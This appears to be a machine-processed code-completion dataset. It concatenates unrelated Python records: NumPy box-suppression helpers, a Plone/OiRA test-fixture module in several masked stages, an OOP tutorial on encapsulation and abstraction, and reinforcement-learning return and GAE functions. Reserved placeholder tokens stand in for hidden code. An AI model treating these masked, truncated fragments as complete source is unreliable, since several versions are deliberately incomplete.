np.maximum(0.0, yy2 - yy1 + 1).copy()\n\n\t\tinter = w * h\n\t\tif method == \"Min\":\n\t\t\to = inter / np.minimum(area[i], area[idx])\n\t\telse:\n\t\t\to = inter / (area[i] + area[idx] - inter)\n\t\tI = I[np.where(o <= threshold)]\n\n\tpick = pick[:counter].copy()\n\treturn pick\n\n\ndef batched_nms_numpy(boxes, scores, idxs, threshold, method):\n\tdevice = boxes.device\n\tif boxes.numel() == 0:\n\t\treturn torch.empty((0,), dtype=torch.int64, device=device)\n\t# strategy: in order to perform NMS independently per class.\n\t# we add an offset to all the boxes. The offset is dependent\n\t# only on the class idx, and is large enough so that boxes\n\t# from different classes do not overlap\n\tmax_coordinate = boxes.max()\n\toffsets = idxs.to(boxes) * (max_coordinate + 1)\n\tboxes_for_nms = boxes + offsets[:, None]\n\tboxes_for_nms = boxes_for_nms.cpu().numpy()\n\tscores = scores.cpu().numpy()\n\tkeep = nms_numpy(boxes_for_nms, scores, threshold, method)\n\treturn torch.as_tensor(keep, dtype=torch.long, device=device)\n\n\ndef pad(boxes, w, h):\n\tboxes = boxes.trunc().int().cpu().numpy()\n\tx = boxes[:, 0]\n\ty = boxes[:, 1]\n\tex = boxes[:, 2]\n\tey = boxes[:, 3]\n\n\tx[x < 1] = 1\n\ty[y < 1] = 1\n\tex[ex > w] = w\n\tey[ey > h] = h\n\n\treturn y, ey, x, ex\n\n\ndef rerec(bboxA):\n\th = bboxA[:, 3] - bboxA[:, 1]\n\tw = bboxA[:, 2] - bboxA[:, 0]\n\n\tl = torch.max(w, h)\n\tbboxA[:, 0] = bboxA[:, 0] + w * 0.5 - l * 0.5\n\tbboxA[:, 1] = bboxA[:, 1] + h * 0.5 - l * 0.5\n\tbboxA[:, 2:4] = bboxA[:, :2] + l.repeat(2, 1).permute(1, 0)\n\n\treturn bboxA\n\n\ndef imresample(img, sz):\n\tim_data = interpolate(img, size=sz, mode=\"area\")\n\treturn im_data",
"step-ids": [
17,
18,
19,
21,
23
]
}
|
[
17,
18,
19,
21,
23
] |
<|reserved_special_token_0|>
class OiRAFixture(PloneSandboxLayer):
<|reserved_special_token_0|>
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml', Products.statusmessages, context=
configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml', Products.membrane, context=
configurationContext)
import euphorie.client.tests
xmlconfig.file('configure.zcml', euphorie.client.tests, context=
configurationContext)
import osha.oira
xmlconfig.file('configure.zcml', osha.oira, context=
configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OiRAFixture(PloneSandboxLayer):
defaultBases = PLONE_FIXTURE,
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml', Products.statusmessages, context=
configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml', Products.membrane, context=
configurationContext)
import euphorie.client.tests
xmlconfig.file('configure.zcml', euphorie.client.tests, context=
configurationContext)
import osha.oira
xmlconfig.file('configure.zcml', osha.oira, context=
configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class OiRAFixture(PloneSandboxLayer):
defaultBases = PLONE_FIXTURE,
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml', Products.statusmessages, context=
configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml', Products.membrane, context=
configurationContext)
import euphorie.client.tests
xmlconfig.file('configure.zcml', euphorie.client.tests, context=
configurationContext)
import osha.oira
xmlconfig.file('configure.zcml', osha.oira, context=
configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
OIRA_FIXTURE = OiRAFixture()
OIRA_INTEGRATION_TESTING = IntegrationTesting(bases=(OIRA_FIXTURE,), name=
'osha.oira:Integration')
OIRA_SUITE_ROBOT = FunctionalTesting(bases=(OIRA_FIXTURE,
AUTOLOGIN_LIBRARY_FIXTURE, z2.ZSERVER_FIXTURE), name='OIRA_SUITE_ROBOT')
<|reserved_special_token_1|>
from plone import api
from plone.app.robotframework.testing import AUTOLOGIN_LIBRARY_FIXTURE
from plone.app.testing import applyProfile
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PLONE_FIXTURE
from plone.app.testing import PloneSandboxLayer
from plone.testing import z2
from zope.configuration import xmlconfig
class OiRAFixture(PloneSandboxLayer):
defaultBases = PLONE_FIXTURE,
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml', Products.statusmessages, context=
configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml', Products.membrane, context=
configurationContext)
import euphorie.client.tests
xmlconfig.file('configure.zcml', euphorie.client.tests, context=
configurationContext)
import osha.oira
xmlconfig.file('configure.zcml', osha.oira, context=
configurationContext)
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
OIRA_FIXTURE = OiRAFixture()
OIRA_INTEGRATION_TESTING = IntegrationTesting(bases=(OIRA_FIXTURE,), name=
'osha.oira:Integration')
OIRA_SUITE_ROBOT = FunctionalTesting(bases=(OIRA_FIXTURE,
AUTOLOGIN_LIBRARY_FIXTURE, z2.ZSERVER_FIXTURE), name='OIRA_SUITE_ROBOT')
<|reserved_special_token_1|>
from plone import api
from plone.app.robotframework.testing import AUTOLOGIN_LIBRARY_FIXTURE
from plone.app.testing import applyProfile
from plone.app.testing import FunctionalTesting
from plone.app.testing import IntegrationTesting
from plone.app.testing import PLONE_FIXTURE
from plone.app.testing import PloneSandboxLayer
from plone.testing import z2
from zope.configuration import xmlconfig
class OiRAFixture(PloneSandboxLayer):
defaultBases = (PLONE_FIXTURE,)
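    # Install dependency products on the Zope application and load their ZCML;
    # this runs before the Plone site is created.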
def setUpZope(self, app, configurationContext):
z2.installProduct(app, 'Products.membrane')
z2.installProduct(app, 'Products.statusmessages')
import Products.statusmessages
xmlconfig.file('configure.zcml',
Products.statusmessages,
context=configurationContext)
import Products.membrane
xmlconfig.file('configure.zcml',
Products.membrane,
context=configurationContext)
import euphorie.client.tests
xmlconfig.file("configure.zcml",
euphorie.client.tests,
context=configurationContext)
import osha.oira
xmlconfig.file('configure.zcml',
osha.oira,
context=configurationContext)
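    # With the Plone site available, pick the default workflow and apply the
    # installation profiles of Euphorie and OiRA.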
def setUpPloneSite(self, portal):
wftool = api.portal.get_tool(name='portal_workflow')
wftool.setDefaultChain('plone_workflow')
applyProfile(portal, 'euphorie.content:default')
applyProfile(portal, 'euphorie.client:default')
applyProfile(portal, 'euphorie.deployment:default')
applyProfile(portal, 'osha.oira:default')
OIRA_FIXTURE = OiRAFixture()
OIRA_INTEGRATION_TESTING = IntegrationTesting(
    bases=(OIRA_FIXTURE,),
    name="osha.oira:Integration"
)
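# Functional layer for Robot Framework suites: adds the auto-login remote
# library and a running ZServer on top of the base fixture.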
OIRA_SUITE_ROBOT = FunctionalTesting(
bases=(OIRA_FIXTURE,
AUTOLOGIN_LIBRARY_FIXTURE,
z2.ZSERVER_FIXTURE),
name="OIRA_SUITE_ROBOT")
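# Not part of the original module: a minimal sketch, following plone.app.testing
# conventions, of how the integration layer would typically be consumed in a
# test case. The class and test names are illustrative.
import unittest


class TestOiRASketch(unittest.TestCase):
    layer = OIRA_INTEGRATION_TESTING

    def test_portal_is_set_up(self):
        # The layer exposes the Plone site under the 'portal' resource key.
        self.assertIsNotNone(self.layer['portal'])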
|
flexible
|
{
"blob_id": "eec2b818ea9d50161bad60e8bf83dcb7ce9bf9fa",
"index": 7428,
"step-1": "<mask token>\n\n\nclass OiRAFixture(PloneSandboxLayer):\n <mask token>\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml', Products.statusmessages, context=\n configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml', Products.membrane, context=\n configurationContext)\n import euphorie.client.tests\n xmlconfig.file('configure.zcml', euphorie.client.tests, context=\n configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml', osha.oira, context=\n configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass OiRAFixture(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml', Products.statusmessages, context=\n configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml', Products.membrane, context=\n configurationContext)\n import euphorie.client.tests\n xmlconfig.file('configure.zcml', euphorie.client.tests, context=\n configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml', osha.oira, context=\n configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass OiRAFixture(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml', Products.statusmessages, context=\n configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml', Products.membrane, context=\n configurationContext)\n import euphorie.client.tests\n xmlconfig.file('configure.zcml', euphorie.client.tests, context=\n configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml', osha.oira, context=\n configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\n\nOIRA_FIXTURE = OiRAFixture()\nOIRA_INTEGRATION_TESTING = IntegrationTesting(bases=(OIRA_FIXTURE,), name=\n 'osha.oira:Integration')\nOIRA_SUITE_ROBOT = FunctionalTesting(bases=(OIRA_FIXTURE,\n AUTOLOGIN_LIBRARY_FIXTURE, z2.ZSERVER_FIXTURE), name='OIRA_SUITE_ROBOT')\n",
"step-4": "from plone import api\nfrom plone.app.robotframework.testing import AUTOLOGIN_LIBRARY_FIXTURE\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.testing import z2\nfrom zope.configuration import xmlconfig\n\n\nclass OiRAFixture(PloneSandboxLayer):\n defaultBases = PLONE_FIXTURE,\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml', Products.statusmessages, context=\n configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml', Products.membrane, context=\n configurationContext)\n import euphorie.client.tests\n xmlconfig.file('configure.zcml', euphorie.client.tests, context=\n configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml', osha.oira, context=\n configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\n\nOIRA_FIXTURE = OiRAFixture()\nOIRA_INTEGRATION_TESTING = IntegrationTesting(bases=(OIRA_FIXTURE,), name=\n 'osha.oira:Integration')\nOIRA_SUITE_ROBOT = FunctionalTesting(bases=(OIRA_FIXTURE,\n AUTOLOGIN_LIBRARY_FIXTURE, z2.ZSERVER_FIXTURE), name='OIRA_SUITE_ROBOT')\n",
"step-5": "from plone import api\nfrom plone.app.robotframework.testing import AUTOLOGIN_LIBRARY_FIXTURE\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PLONE_FIXTURE\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.testing import z2\nfrom zope.configuration import xmlconfig\n\n\nclass OiRAFixture(PloneSandboxLayer):\n defaultBases = (PLONE_FIXTURE,)\n\n def setUpZope(self, app, configurationContext):\n z2.installProduct(app, 'Products.membrane')\n z2.installProduct(app, 'Products.statusmessages')\n import Products.statusmessages\n xmlconfig.file('configure.zcml',\n Products.statusmessages,\n context=configurationContext)\n import Products.membrane\n xmlconfig.file('configure.zcml',\n Products.membrane,\n context=configurationContext)\n import euphorie.client.tests\n xmlconfig.file(\"configure.zcml\",\n euphorie.client.tests,\n context=configurationContext)\n import osha.oira\n xmlconfig.file('configure.zcml',\n osha.oira,\n context=configurationContext)\n\n def setUpPloneSite(self, portal):\n wftool = api.portal.get_tool(name='portal_workflow')\n wftool.setDefaultChain('plone_workflow')\n applyProfile(portal, 'euphorie.content:default')\n applyProfile(portal, 'euphorie.client:default')\n applyProfile(portal, 'euphorie.deployment:default')\n applyProfile(portal, 'osha.oira:default')\n\nOIRA_FIXTURE = OiRAFixture()\nOIRA_INTEGRATION_TESTING = \\\n IntegrationTesting(\n bases=(OIRA_FIXTURE,),\n name=\"osha.oira:Integration\"\n )\n\nOIRA_SUITE_ROBOT = FunctionalTesting(\n bases=(OIRA_FIXTURE,\n AUTOLOGIN_LIBRARY_FIXTURE,\n z2.ZSERVER_FIXTURE),\n name=\"OIRA_SUITE_ROBOT\")\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
class House2:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print('Starting engine')
def stop(self):
print('Stopping engine')
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print('Car is in drive mode')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class House:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class House2:
def setWall(self, dynamicWall):
self.wall = dynamicWall
def getWall(self):
print(self.wall)
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print('Starting engine')
def stop(self):
print('Stopping engine')
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print('Car is in drive mode')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class House:
def __init__(self, wallDynamic):
self.__wall = wallDynamic
<|reserved_special_token_0|>
class House2:
def setWall(self, dynamicWall):
self.wall = dynamicWall
def getWall(self):
print(self.wall)
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print('Starting engine')
def stop(self):
print('Stopping engine')
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print('Car is in drive mode')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class House:
def __init__(self, wallDynamic):
self.__wall = wallDynamic
<|reserved_special_token_0|>
print(house._House__wall)
class House2:
def setWall(self, dynamicWall):
self.wall = dynamicWall
def getWall(self):
print(self.wall)
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print('Starting engine')
def stop(self):
print('Stopping engine')
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print('Car is in drive mode')
<|reserved_special_token_1|>
# 4 Pillars of OOP:
# 1. Encapsulation: Encapsulation in Python is the process of wrapping up variables and methods into a single entity. In programming, a class is an example that wraps all the variables and methods defined inside it.
# 2. Abstraction: Abstraction in Python is the process of hiding the real implementation of an application from the user and emphasizing only its usage.
# 3. Inheritance: It is the process of creating a class that can derive or inherit the properties and methods from another class (parent/base).
# 4. Polymorphism: Polymorphism means the ability to take various forms.
# Encapsulation:
# Encapsulation is a process of protecting the data and functionality of a class in a single unit, called an object.
# This mechanism is often used to protect the data of an object from other objects.
# It’s one of the fundamental principles in any programming language that supports object-oriented programming.
# We can protect the variables in the class by marking them as private. We need to add two underscores as a prefix to make a variable private.
# Once we make a variable private, we can't access it directly from the objects of that class.
# Now, let’s see how to create private variables:
# e.g.:
from abc import abstractmethod, ABC
class House:
def __init__(self, wallDynamic):
self.__wall = wallDynamic
# In the above example, __wall is a private variable.
# Once a variable is declared as private, the only way to access it directly is through name mangling.
# In the name mangling process, an identifier with two leading underscores and at most one trailing underscore is
# textually replaced with _classname__identifier, where classname is the name of the current class and identifier is the private variable.
house = House(1)
# Using name mangling to access private variables
print(house._House__wall)  # Output - 1
# To implement proper encapsulation in Python, we need to use setters and getters, as shown below:
class House2:
def setWall(self, dynamicWall):
self.wall = dynamicWall
def getWall(self):
print(self.wall)
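# A quick usage sketch of the setter/getter pair above (the value 4 is arbitrary):
house2 = House2()
house2.setWall(4)
house2.getWall()  # prints 4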
# Abstraction:
# Abstraction in OOP is a process of hiding the real implementation of the method by only showing a method signature.
# In Python, we can achieve abstraction using ABC (abstract base class) or abstract methods.
# ABC is a class from the abc module in Python.
# If we extend any class with ABC and include any abstract methods,
# then the classes inherited from this class will have to implement those abstract methods.
# When we annotate any method with the abstractmethod decorator, then it is an abstract method in Python (it won't have any method implementation).
# If a class defines an abstractmethod but does not inherit from an abstract class, then implementing the abstractmethod is optional (it is not enforced).
class Vehicle(ABC):
def __init__(self, speed, year):
self.speed = speed
self.year = year
def start(self):
print("Starting engine")
def stop(self):
print("Stopping engine")
@abstractmethod
def drive(self):
pass
class Car(Vehicle):
def __init__(self, canClimbMountains, speed, year):
Vehicle.__init__(self, speed, year)
self.canClimbMountains = canClimbMountains
def drive(self):
print("Car is in drive mode")
# Here, Vehicle is a parent class inherited from ABC. It has an abstract method, drive.
# Car is another class that is inherited from Vehicle, so it had to implement the drive method.
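# Illustrative usage (argument values are arbitrary): Car can be instantiated
# because it implements drive, while instantiating Vehicle directly raises a
# TypeError.
car = Car(canClimbMountains=True, speed=120, year=2020)
car.start()  # Starting engine
car.drive()  # Car is in drive mode
car.stop()   # Stopping engine
# Vehicle(120, 2020)  # TypeError: Can't instantiate abstract class Vehicle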
|
flexible
|
{
"blob_id": "0e4c82d6eb77d2b6357925c9aab516bcc3310a4c",
"index": 140,
"step-1": "<mask token>\n\n\nclass House2:\n <mask token>\n <mask token>\n\n\nclass Vehicle(ABC):\n\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print('Starting engine')\n\n def stop(self):\n print('Stopping engine')\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print('Car is in drive mode')\n",
"step-2": "<mask token>\n\n\nclass House:\n <mask token>\n\n\n<mask token>\n\n\nclass House2:\n\n def setWall(self, dynamicWall):\n self.wall = dynamicWall\n\n def getWall(self):\n print(self.wall)\n\n\nclass Vehicle(ABC):\n\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print('Starting engine')\n\n def stop(self):\n print('Stopping engine')\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print('Car is in drive mode')\n",
"step-3": "<mask token>\n\n\nclass House:\n\n def __init__(self, wallDynamic):\n self.__wall = wallDynamic\n\n\n<mask token>\n\n\nclass House2:\n\n def setWall(self, dynamicWall):\n self.wall = dynamicWall\n\n def getWall(self):\n print(self.wall)\n\n\nclass Vehicle(ABC):\n\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print('Starting engine')\n\n def stop(self):\n print('Stopping engine')\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print('Car is in drive mode')\n",
"step-4": "<mask token>\n\n\nclass House:\n\n def __init__(self, wallDynamic):\n self.__wall = wallDynamic\n\n\n<mask token>\nprint(house._House__wall)\n\n\nclass House2:\n\n def setWall(self, dynamicWall):\n self.wall = dynamicWall\n\n def getWall(self):\n print(self.wall)\n\n\nclass Vehicle(ABC):\n\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print('Starting engine')\n\n def stop(self):\n print('Stopping engine')\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print('Car is in drive mode')\n",
"step-5": "# 4 Pillars of OOP:\n# 1. Encapsulation: Encapsulation in Python is the process of wrapping up variables and methods into a single entity.In programming, a class is an example that wraps all the variables and methods defined inside it.\n# 2. Abstraction: Abstraction in Python is the process of hiding the real implementation of an application from the user and emphasizing only on usage of it.\n# 3. Inheritance: It is the process of creating a class that can derive or inherit the properties and methods from another class(parent/base).\n# 4. Polymorphism: Polymorphism means the ability to take various forms.\n\n# Encapsulation:\n\n# Encapsulation is a process of protecting the data and functionality of a class in a single unit, called an object.\n# This mechanism is often used to protect the data of an object from other objects.\n# It’s one of the fundamental principles in any programming language that supports object-oriented programming.\n# We can protect the variables in the class by marking them as private. We need to add two underscores as a prefix to make a variable private.\n# Once we make a variable as private, we can’t access them directly from the objects of that class.\n# Now, let’s see how to create private variables:\n\n# eg:\nfrom abc import abstractmethod, ABC\n\n\nclass House:\n\n def __init__(self, wallDynamic):\n self.__wall = wallDynamic\n\n# In the above example, wall is a private variable.\n# Once a variable is declared as private, the only way to access those variables is through name mangling.\n# In the name mangling process, an identifier with two leading underscores and one trailing underscore is\n# textually replaced with _classname__identifier , where class-name is the name of the current class and identifier is the private variable.\n\n\nhouse = House(1)\n\n# Using name mangling to access private variables\nprint(house._House__wall) # OutPut - 1\n\n# To implement proper encapsulation in Python, we need to use setters and getters, as shown below:\n\n\nclass House2:\n\n def setWall(self, dynamicWall):\n self.wall = dynamicWall\n\n def getWall(self):\n print(self.wall)\n\n\n# Abstraction:\n\n# Abstraction in OOP is a process of hiding the real implementation of the method by only showing a method signature.\n# In Python, we can achieve abstraction using ABC(abstraction class) or abstract method.\n# ABC is a class from the abc module in Python.\n# If we extend any class with ABC and include any abstraction methods,\n# then the classes inherited from this class will have to mandatorily implement those abstract methods.\n# When we annotate any method with an abstractmethod keyword, then it is an abstract method in Python(it won’t have any method implementation).\n# If the parent class has abstractmethod and not inherited from an abstract class, then it is optional to implement the abstractmethod .\n\n\nclass Vehicle(ABC):\n def __init__(self, speed, year):\n self.speed = speed\n self.year = year\n\n def start(self):\n print(\"Starting engine\")\n\n def stop(self):\n print(\"Stopping engine\")\n\n @abstractmethod\n def drive(self):\n pass\n\n\nclass Car(Vehicle):\n def __init__(self, canClimbMountains, speed, year):\n Vehicle.__init__(self, speed, year)\n self.canClimbMountains = canClimbMountains\n\n def drive(self):\n print(\"Car is in drive mode\")\n\n\n# Here, Vehicle is a parent inherited from ABC class. It has an abstraction method drive.\n# Car is another class that is inherited from Vehicle, so it had to implement the drive method.\n",
"step-ids": [
9,
12,
13,
14,
17
]
}
|
[
9,
12,
13,
14,
17
] |
<|reserved_special_token_0|>
def calc_returns(batch, gamma):
"""
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
"""
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
<|reserved_special_token_0|>
def calc_nstep_returns(batch, gamma, n, v_preds):
"""
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
"""
rets = calc_returns(batch, gamma)
rets_len = len(rets)
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(
), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
"""
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
"""
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def calc_returns(batch, gamma):
"""
Calculate the simple returns (full rollout) for advantage
i.e. sum discounted rewards up till termination
"""
rewards = batch['rewards']
assert not np.any(np.isnan(rewards))
not_dones = 1 - batch['dones']
T = len(rewards)
rets = np.empty(T, 'float32')
future_ret = 0.0
for t in reversed(range(T)):
future_ret = rewards[t] + gamma * future_ret * not_dones[t]
rets[t] = future_ret
rets = torch.from_numpy(rets).float()
return rets
def calc_gammas(batch, gamma):
"""Calculate the gammas to the right power for multiplication with rewards"""
news = torch.cat([torch.ones((1,)), batch['dones'][:-1]])
gammas = torch.empty_like(news)
cur_gamma = 1.0
for t, new in enumerate(news):
cur_gamma = new * 1.0 + (1 - new) * cur_gamma * gamma
gammas[t] = cur_gamma
return gammas
def calc_nstep_returns(batch, gamma, n, v_preds):
"""
Calculate the n-step returns for advantage
see n-step return in: http://www-anw.cs.umass.edu/~barto/courses/cs687/Chapter%207.pdf
i.e. for each timestep t:
sum discounted rewards up till step n (0 to n-1 that is),
then add v_pred for n as final term
"""
rets = calc_returns(batch, gamma)
rets_len = len(rets)
tail_rets = torch.cat([rets[n:], torch.zeros((n,))])[:rets_len]
gammas = calc_gammas(batch, gamma)
final_terms = gammas * v_preds
final_terms = torch.cat([final_terms[n:], torch.zeros((n,))])[:rets_len]
nstep_rets = rets - tail_rets + final_terms
assert not np.isnan(nstep_rets).any(
), f'N-step returns has nan: {nstep_rets}'
return nstep_rets
def calc_gaes(rewards, v_preds, next_v_preds, gamma, lam):
"""
Calculate GAE
See http://www.breloff.com/DeepRL-OnlineGAE/ for clear example.
v_preds are values predicted for current states
next_v_preds are values predicted for next states
NOTE for standardization trick, do it out of here
"""
T = len(rewards)
assert not np.any(np.isnan(rewards))
assert T == len(v_preds)
gaes = np.empty(T, 'float32')
future_gae = 0.0
for t in reversed(range(T)):
delta = rewards[t] + gamma * next_v_preds[t] - v_preds[t]
gaes[t] = future_gae = delta + gamma * lam * future_gae
assert not np.isnan(gaes).any(), f'GAE has nan: {gaes}'
gaes = torch.from_numpy(gaes).float()
return gaes
<|reserved_special_token_1|>
<|reserved_special_token_0|>
logger = logger.get_logger(__name__)
def calc_returns(batch, gamma):
"""
